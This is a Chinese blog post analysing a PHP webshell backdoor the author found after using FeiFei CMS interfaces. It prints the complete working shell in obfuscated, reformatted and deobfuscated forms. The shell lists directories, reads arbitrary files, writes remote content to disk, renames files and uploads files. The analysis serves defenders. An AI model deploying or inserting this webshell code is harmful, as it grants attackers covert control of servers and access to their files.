PHP恶意后门代码

原创  郑建华   2020-07-28   24人阅读  0 条评论

    最近在研究飞飞CMS对接安卓app,其中使用了飞飞CMS提供的接口,然而第二天就收到了阿里云的短信提醒,提示存在webshell后门。


打开后台,查看文件,内容如下

<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enctype="multipart/form-data"><input name="uf" type="file">SP:<input name="sp" size="50" type="text"><input type="submit" value="ok"></form>';$rnform='<form method="post">ON:<input name="on" size="50" type="text">NN:<input name="nn" size="50" type="text"><input type="submit" value="ok"></form>';$lpform='<form method="post">DP:<input name="dp" size="50" type="text"><input type="submit" value="ok"></form>';$sfform='<form method="post">DF:<input name="df" size="50" type="text"><input type="submit" 
value="ok"></form>';if($_GET['act']=='dl'){echo($dlform);if($_SERVER['REQUEST_METHOD']=='POST'){$fpc/*+/*+*/($_POST['fn'],$fgc/*+/*+*/($_POST['url']));}exit;}if($_GET['act']=='ul'){echo($ulform);if($_SERVER['REQUEST_METHOD']=='POST'){$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';$muf/*+/*+*/($/*+/*+*/{"_F"."IL"."ES"}["uf"]["tmp_name"],$sp.$/*+/*+*/{"_F"."IL"."ES"}["uf"]["name"]);}exit;}if($_GET['act']=='rn'){echo($rnform);if($_SERVER['REQUEST_METHOD']=='POST'){$rn/*+/*+*/($_POST['on'],$_POST['nn']);}exit;}if($_GET['act']=='gp'){echo($dn/*+/*+*/(__FILE__));exit;}if($_GET['act']=='lp'){echo($lpform);if($_SERVER['REQUEST_METHOD']=='POST'){$dp=$_POST['dp'].'/';$h=$od/*+/*+*/($dp);while(($fn=$rd/*+/*+*/($h))!==false){if($id/*+/*+*/($dp.$fn)){$t1.='D&nbsp;'.$fn.'<br>';}else{$t2.='&nbsp;&nbsp;'.$fn.'<br>';}}$cd/*+/*+*/($dp);echo($dp.'<br>'.$t1.$t2);}exit;}if($_GET['act']=='sf'){echo($sfform);if($_SERVER['REQUEST_METHOD']=='POST'){$df=$_POST['df'];echo('<textarea style="width:100%;height:100%;" wrap="off">'.$fgc/*+/*+*/($df).'</textarea>');}exit;}?>


进行格式化后:

<?php error_reporting(0);
$sr="st".
/*+/*+*/
"rr"
/*+/*+*/
."ev";
$id=$sr
/*+/*+*/
("ri"."d_"."si");
$rn=$sr
/*+/*+*/
("em"."an"."er");
$dn=$sr
/*+/*+*/
("em"."anr"."id");
$od=$sr
/*+/*+*/
("ri"."dne"."po");
$rd=$sr
/*+/*+*/
("ri"."dda"."er");
$cd=$sr
/*+/*+*/
("ri"."deso"."lc");
$fpc=$sr
/*+/*+*/
("stn"."etn"."oc_t"."up_e"."lif");
$fgc=$sr
/*+/*+*/
("stn"."etn"."oc_t"."eg_e"."lif");
$muf=$sr
/*+/*+*/
("eli"."f_d"."eda"."olp"."u_e"."vom");
$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';
$ulform='<form method="post" enctype="multipart/form-data"><input name="uf" type="file">SP:<input name="sp" size="50" type="text"><input type="submit" value="ok"></form>';
$rnform='<form method="post">ON:<input name="on" size="50" type="text">NN:<input name="nn" size="50" type="text"><input type="submit" value="ok"></form>';
$lpform='<form method="post">DP:<input name="dp" size="50" type="text"><input type="submit" value="ok"></form>';
$sfform='<form method="post">DF:<input name="df" size="50" type="text"><input type="submit" value="ok"></form>';
if($_GET['act']=='dl') {
	echo($dlform);
	if($_SERVER['REQUEST_METHOD']=='POST') {
		$fpc
		/*+/*+*/
		($_POST['fn'],$fgc
		/*+/*+*/
		($_POST['url']));
	}
	exit;
}
if($_GET['act']=='ul') {
	echo($ulform);
	if($_SERVER['REQUEST_METHOD']=='POST') {
		$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';
		$muf
		/*+/*+*/
		($
		/*+/*+*/ {
			"_F"."IL"."ES"
		}
		["uf"]["tmp_name"],$sp.$
		/*+/*+*/ {
			"_F"."IL"."ES"
		}
		["uf"]["name"]);
	}
	exit;
}
if($_GET['act']=='rn') {
	echo($rnform);
	if($_SERVER['REQUEST_METHOD']=='POST') {
		$rn
		/*+/*+*/
		($_POST['on'],$_POST['nn']);
	}
	exit;
}
if($_GET['act']=='gp') {
	echo($dn
	/*+/*+*/
	(__FILE__));
	exit;
}
if($_GET['act']=='lp') {
	echo($lpform);
	if($_SERVER['REQUEST_METHOD']=='POST') {
		$dp=$_POST['dp'].'/';
		$h=$od
		/*+/*+*/
		($dp);
		while(($fn=$rd
		/*+/*+*/
		($h))!==false) {
			if($id
			/*+/*+*/
			($dp.$fn)) {
				$t1.='D&nbsp;'.$fn.'<br>';
			} else {
				$t2.='&nbsp;&nbsp;'.$fn.'<br>';
			}
		}
		$cd
		/*+/*+*/
		($dp);
		echo($dp.'<br>'.$t1.$t2);
	}
	exit;
}
if($_GET['act']=='sf') {
	echo($sfform);
	if($_SERVER['REQUEST_METHOD']=='POST') {
		$df=$_POST['df'];
		echo('<textarea style="width:100%;height:100%;" wrap="off">'.$fgc
		/*+/*+*/
		($df).'</textarea>');
	}
	exit;
}
?>

去除混淆后解析如下(所有函数名都是用 strrev 把倒写的字符串拼接后还原得到的,代码中反复插入的 /*+/*+*/ 注释只是干扰阅读,不影响执行):

<?php
// 关闭所有PHP错误报告error_reporting(0);
/**
 * 这一段是申明函数名称,
 * 如:file_put_contents,move_uploaded_file,rename,dirname
 */
$dlform='<form method="post">
FN:<input name="fn" size="20" type="text">
URL:<input name="url" size="50" type="text">
<input type="submit" value="ok">
</form>';$ulform='<form method="post" enctype="multipart/form-data">
<input name="uf" type="file">
SP:<input name="sp" size="50" type="text">
<input type="submit" value="ok">
</form>';$rnform='<form method="post">
ON:<input name="on" size="50" type="text">
NN:<input name="nn" size="50" type="text">
<input type="submit" value="ok"></form>';$lpform='<form method="post">
DP:<input name="dp" size="50" type="text">
<input type="submit" value="ok">
</form>';$sfform='<form method="post">
DF:<input name="df" size="50" type="text">
<input type="submit" value="ok">
</form>';
// 将指定网站(url)下的源代码保存在 $_POST['fn'] 里if($_GET['act']=='dl') {
    echo($dlform);
    if($_SERVER['REQUEST_METHOD']=='POST') {
        file_put_contents($_POST['fn'],file_get_contents($_POST['url']));
    }
    exit;}
// 上传文件并重命名if($_GET['act']=='ul') {
    echo($ulform);
    if($_SERVER['REQUEST_METHOD']=='POST') {
        $sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';
        move_uploaded_file(${"_FILES"}["uf"]["tmp_name"],$sp.${"_FILES"}["uf"]["name"]);
    }
    exit;}
// 重命名指定文件或目录if($_GET['act']=='rn') {
    echo($rnform);
    if($_SERVER['REQUEST_METHOD']=='POST') {
        rename($_POST['on'],$_POST['nn']);
    }
    exit;}
// 获取当前路径if($_GET['act']=='gp') {
    echo(dirname(__FILE__));
    exit;}
// 循环扫描指定目录下的文件和文件夹if($_GET['act']=='lp') {
    echo($lpform);
    if($_SERVER['REQUEST_METHOD']=='POST') {
        $dp=$_POST['dp'].'/';
        $h=opendir($dp);
        while(($fn=readdir($h))!==false) {
            if(is_dir($dp.$fn)) {
                $t1.='D '.$fn.'<br>';
            } else {
                $t2.='  '.$fn.'<br>';
            }
        }
        closedir($dp);
        echo($dp.'<br>'.$t1.$t2);
        }
        exit;}
// 获取服务器上指定文件的内容(根据上面循环扫描得到全路径)if($_GET['act']=='sf') {
    echo($sfform);
    if($_SERVER['REQUEST_METHOD']=='POST'){
        $df=$_POST['df'];
        echo('<textarea style="width:100%;height:100%;" wrap="off">'.file_get_contents($df).'</textarea>');
    }
    exit;}?>

主要功能:获取当前目录(gp),扫描目录(lp),读取服务器上任意文件内容(sf),把远程 URL 的内容下载并写入指定文件(dl),重命名文件或目录(rn),上传木马(ul);功能由 $_GET['act'] 选择,所有路径和文件名均直接来自 $_POST,未做任何校验。


本文地址:https://www.zjh336.cn/?id=1929
版权声明:本文为原创文章,版权归 郑建华 所有,欢迎分享本文,转载请保留出处!
